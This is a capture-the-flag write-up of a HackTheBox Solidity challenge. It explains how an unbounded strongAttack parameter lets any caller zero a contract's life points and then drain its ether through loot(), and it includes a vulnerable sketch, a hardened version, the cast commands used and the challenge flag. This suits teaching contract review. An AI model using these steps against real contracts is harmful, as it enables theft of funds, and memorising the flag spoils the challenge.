We covered an introduction to blockchain penetration testing by working through a blockchain challenge from HackTheBox. The challenge provides its source code, written in Solidity, with a couple of functions that implement the challenge logic. We installed the Foundry suite of tools with foundryup to interact with the chain, then used the cast tool to call the functions loot(), strongAttack() and punch() to solve the challenge. This was part of HackTheBox Survival Of The Fittest.
Solidity Language
Solidity is a language commonly used in developing blockchain applications.
Interaction With The BlockChain
To interact with the chain, we will need the following information:
Private key
The address of the target contract
The RPC URL
The Challenge
Think of this step as being a digital detective analyzing a mystery. You’re provided with two Solidity smart contracts, Setup.sol and Creature.sol, which serve as the game’s framework.
Setup.sol initiates the challenge by deploying a Creature contract and funding it with 1 ether. Your mission is to drain this balance completely.
Creature.sol defines your opponent: the creature you need to defeat. It starts with 20 life points, and your objective is to reduce these points to zero to claim victory.
To capture the flag, you must bring the creature’s life points from 20 to 0. You can do this using two attack options:
punch() – a basic attack that deals 1 damage.
strongAttack(uint256 _damage) – a more powerful attack where you choose the damage.
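The design weakness behind this challenge, shown as an added example that is not the challenge's Creature.sol: the first contract models the behaviour described above, and the second is one way to bound it. The contract names, the MAX_DAMAGE cap and the treasury payee are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Hypothetical model of the behaviour described above; not the challenge's Creature.sol.
contract CreatureSketch {
    uint256 public lifePoints = 20;

    constructor() payable {} // funded at deployment, as Setup.sol is described doing

    function punch() external { _dealDamage(1); }

    // Weak point: the caller chooses the damage and nothing bounds it,
    // so one call with 20 empties the life points.
    function strongAttack(uint256 _damage) external { _dealDamage(_damage); }

    // Pays the whole balance to whoever calls once lifePoints is zero.
    function loot() external {
        require(lifePoints == 0, "creature still alive");
        payable(msg.sender).transfer(address(this).balance);
    }

    function _dealDamage(uint256 _damage) internal {
        lifePoints -= _damage; // 0.8.x reverts on underflow: 21 fails, 20 succeeds
    }
}

// Hardened variant (assumed design): bounded damage, payout only to a fixed address.
contract CreatureBounded {
    uint256 public constant MAX_DAMAGE = 3; // constructed value
    uint256 public lifePoints = 20;
    address public immutable treasury;      // hypothetical payee set at deployment

    constructor(address _treasury) payable { treasury = _treasury; }

    function strongAttack(uint256 _damage) external {
        require(_damage > 0 && _damage <= MAX_DAMAGE, "damage out of range");
        lifePoints = _damage >= lifePoints ? 0 : lifePoints - _damage;
    }

    function loot() external {
        require(msg.sender == treasury, "not authorised");
        require(lifePoints == 0, "creature still alive");
        (bool ok, ) = payable(treasury).call{value: address(this).balance}("");
        require(ok, "transfer failed");
    }
}
```

The general point for contract review is that a function releasing funds should not be gated only by state that any external caller can set with a single unvalidated parameter.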
Flags
You can either create a script or simply use Foundry tools. Run the commands listed below, modify the URL by replacing “tag” with “flag”, and you’ll retrieve the flag. The --interactive option makes cast prompt for the private key.
cast send <TargetAddress> "strongAttack(uint256)" 20 --rpc-url <RPC URL> --interactive
cast send <TargetAddress> "loot()" --rpc-url <RPC URL> --interactive
HTB{g0t_y0u2_f1r5t_b100d}